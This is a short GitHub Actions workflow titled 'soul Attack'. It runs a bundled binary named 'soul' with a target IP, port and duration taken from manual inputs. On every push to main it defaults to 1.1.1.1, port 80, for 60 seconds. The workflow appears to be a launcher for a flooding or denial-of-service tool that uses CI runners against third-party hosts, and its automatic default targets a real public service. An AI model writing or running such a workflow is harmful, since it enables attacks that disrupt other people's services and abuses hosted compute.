name: soul Attack

on:
  push:
    branches:
      - main
  workflow_dispatch:
    inputs:
      ip:
        required: true
      port:
        required: true
      time:
        required: true

jobs:
  soul:
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x soul
      - run: ./soul ${{ inputs.ip || '1.1.1.1' }} \
                    ${{ inputs.port || '80' }} \
                    ${{ inputs.time || '60' }}
